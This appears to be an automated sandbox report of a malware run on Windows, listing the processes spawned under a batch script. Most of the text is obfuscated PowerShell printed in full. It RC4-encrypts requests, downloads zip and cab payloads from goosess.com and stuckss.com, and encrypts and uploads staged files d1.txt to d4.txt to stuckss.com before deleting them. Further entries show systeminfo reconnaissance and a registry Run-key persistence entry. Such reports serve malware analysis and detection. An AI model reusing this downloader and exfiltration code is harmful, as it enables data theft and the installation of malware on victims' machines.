  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'https://goosess.com/read/get.php?wc=iew&vf=lk0100';$KWnAhHWFxDer = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2856
- C:\Users\Public\documents\unzip.exe
  unzip.exe -o -P "a0" "C:\Users\Public\Documents\di3726.zip"
  2⤵
  - Executes dropped EXE
  PID:3820
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:4484
- C:\Windows\system32\timeout.exe
  timeout -t 5 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='UMLCWGSL_down.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d1.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='UMLCWGSL_docu.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d2.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='UMLCWGSL_desk.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d3.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function MvkKywHqAI{param ($wobJeEkhXb,$CgZjHZSlbVD);$UlcLAbMMhfQz = [System.Text.Encoding]::UTF8.GetBytes($wobJeEkhXb); $ekTtpYTYUmDj = [System.Text.Encoding]::UTF8.GetBytes($CgZjHZSlbVD);$XomJLXzkAus = New-Object byte[](256);$iEhbBnGQra = New-Object byte[](256);for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$XomJLXzkAus[$LZzjMPVcHiLE] = $LZzjMPVcHiLE;$iEhbBnGQra[$LZzjMPVcHiLE] = $ekTtpYTYUmDj[$LZzjMPVcHiLE % $ekTtpYTYUmDj.Length];}$ZmtmYTnRxPR = 0;for ($LZzjMPVcHiLE = 0; $LZzjMPVcHiLE -lt 256; $LZzjMPVcHiLE++) {$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE] + $iEhbBnGQra[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;}$tKyHKAHbbYxi = New-Object byte[] $UlcLAbMMhfQz.Length;$LZzjMPVcHiLE = 0;$ZmtmYTnRxPR = 0;for ($JuZEgbNvAXZ = 0; $JuZEgbNvAXZ -lt $UlcLAbMMhfQz.Length; $JuZEgbNvAXZ++) {$LZzjMPVcHiLE = ($LZzjMPVcHiLE + 1) % 256;$ZmtmYTnRxPR = ($ZmtmYTnRxPR + $XomJLXzkAus[$LZzjMPVcHiLE]) % 256;$PapcMuOrJKV = $XomJLXzkAus[$LZzjMPVcHiLE];$XomJLXzkAus[$LZzjMPVcHiLE] = $XomJLXzkAus[$ZmtmYTnRxPR];$XomJLXzkAus[$ZmtmYTnRxPR] = $PapcMuOrJKV;$OvilBbzvxhck = ($XomJLXzkAus[$LZzjMPVcHiLE] + $XomJLXzkAus[$ZmtmYTnRxPR]) % 256;$tKyHKAHbbYxi[$JuZEgbNvAXZ] = $UlcLAbMMhfQz[$JuZEgbNvAXZ] -bxor $XomJLXzkAus[$OvilBbzvxhck];}$xkDPxKpMyJA = [System.Convert]::ToBase64String($tKyHKAHbbYxi);return $xkDPxKpMyJA;};$iwZqbJOOHngq=(Get-Date).Ticks.ToString();$eqzyqfKtshq='http://stuckss.com/upload.php';$MTwdyMhaTYjs='UMLCWGSL_sys.txt';$GqrwXQwpGy='C:\Users\Public\Documents\d4.txt';$gMRDFmqKFBul=gc -Path $GqrwXQwpGy -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$MTwdyMhaTYjs=MvkKywHqAI -wobJeEkhXb $MTwdyMhaTYjs -CgZjHZSlbVD $iwZqbJOOHngq;$gMRDFmqKFBul=MvkKywHqAI -wobJeEkhXb $gMRDFmqKFBul -CgZjHZSlbVD $iwZqbJOOHngq;$FJGDlzUBlDZ = [System.Web.HttpUtility]::ParseQueryString('');$FJGDlzUBlDZ['fn']=$MTwdyMhaTYjs;$FJGDlzUBlDZ['fd']=$gMRDFmqKFBul;$FJGDlzUBlDZ['r']=$iwZqbJOOHngq;$VjvsmgNTHY=$FJGDlzUBlDZ.ToString();$cGmHomhQRSLg=[System.Text.Encoding]::UTF8.GetBytes($VjvsmgNTHY);$vSWCboPNXzG=[System.Net.WebRequest]::Create($eqzyqfKtshq);$vSWCboPNXzG.Method='PO'+'ST';$vSWCboPNXzG.ContentType='ap'+'plic'+'ati'+'on/x'+'-ww'+'w-for'+'m-ur'+'len'+'co'+'ded';$vSWCboPNXzG.ContentLength=$cGmHomhQRSLg.Length;$fxVcHSwNgCub = $vSWCboPNXzG.GetRequestStream();$fxVcHSwNgCub.Write($cGmHomhQRSLg,0,$cGmHomhQRSLg.Length);$fxVcHSwNgCub.Close();$ZABcjbdftCBY=$vSWCboPNXzG.GetResponse();if($ZABcjbdftCBY.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $GqrwXQwpGy;$TuJxMBAXFNQ='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $TuJxMBAXFNQ;}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'http://stuckss.com/list.php?f=UMLCWGSL.txt';$KWnAhHWFxDer = 'C:\Users\Public\Documents\rBTob.cab';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2488
- C:\Windows\system32\expand.exe
  expand rBTob.cab -F:* C:\Users\Public\Documents\
  2⤵
  PID:4732
- C:\Windows\system32\timeout.exe
  timeout -t 57 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "function OnavpMuwhH{param ($UmdocLPwMM,$mIiGBlcMoFh);$VFPFIVkdaVP = [System.Text.Encoding]::UTF8.GetBytes($UmdocLPwMM); $vBZPSaMPhEL = [System.Text.Encoding]::UTF8.GetBytes($mIiGBlcMoFh);$VkbCqfOxmF = New-Object byte[](256);$pquiAKHwBut = New-Object byte[](256);for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$VkbCqfOxmF[$pVTuUFZgJeTg] = $pVTuUFZgJeTg;$pquiAKHwBut[$pVTuUFZgJeTg] = $vBZPSaMPhEL[$pVTuUFZgJeTg % $vBZPSaMPhEL.Length];}$cimcjZyRCUM = 0;for ($pVTuUFZgJeTg = 0; $pVTuUFZgJeTg -lt 256; $pVTuUFZgJeTg++) {$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg] + $pquiAKHwBut[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;}$QiBpTOnlBxk = New-Object byte[] $VFPFIVkdaVP.Length;$pVTuUFZgJeTg = 0;$cimcjZyRCUM = 0;for ($qlEMUTGteAdA = 0; $qlEMUTGteAdA -lt $VFPFIVkdaVP.Length; $qlEMUTGteAdA++) {$pVTuUFZgJeTg = ($pVTuUFZgJeTg + 1) % 256;$cimcjZyRCUM = ($cimcjZyRCUM + $VkbCqfOxmF[$pVTuUFZgJeTg]) % 256;$UaOsUHJTbs = $VkbCqfOxmF[$pVTuUFZgJeTg];$VkbCqfOxmF[$pVTuUFZgJeTg] = $VkbCqfOxmF[$cimcjZyRCUM];$VkbCqfOxmF[$cimcjZyRCUM] = $UaOsUHJTbs;$urgWSnAkdSFe = ($VkbCqfOxmF[$pVTuUFZgJeTg] + $VkbCqfOxmF[$cimcjZyRCUM]) % 256;$QiBpTOnlBxk[$qlEMUTGteAdA] = $VFPFIVkdaVP[$qlEMUTGteAdA] -bxor $VkbCqfOxmF[$urgWSnAkdSFe];}$JfnNgtWXCM = [System.Convert]::ToBase64String($QiBpTOnlBxk);return $JfnNgtWXCM;};$VbDSqCkiXZQ = 'http://stuckss.com/list.php?f=UMLCWGSL.txt';$KWnAhHWFxDer = 'C:\Users\Public\Documents\rBTob.cab';Add-Type -AssemblyName 'System.Web';$GilCbwtVtsL=(Get-Date).Ticks.ToString();$JMWjVfWRzVri = $VbDSqCkiXZQ.Split('?')[1];$KNQDusHeEmF = OnavpMuwhH -UmdocLPwMM $JMWjVfWRzVri -mIiGBlcMoFh $GilCbwtVtsL;$VbDSqCkiXZQ=$VbDSqCkiXZQ.Split('?')[0]+'?'+$GilCbwtVtsL+'='+[System.Web.HttpUtility]::UrlEncode($KNQDusHeEmF);iwr -Uri $VbDSqCkiXZQ -OutFile $KWnAhHWFxDer;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2516
- C:\Windows\system32\expand.exe
  expand rBTob.cab -F:* C:\Users\Public\Documents\
  2⤵
  PID:2184
- C:\Windows\system32\timeout.exe
  timeout -t 57 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\documents\49120862.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:1420
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f
  2⤵
  - Adds Run key to start application
  PID:4888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
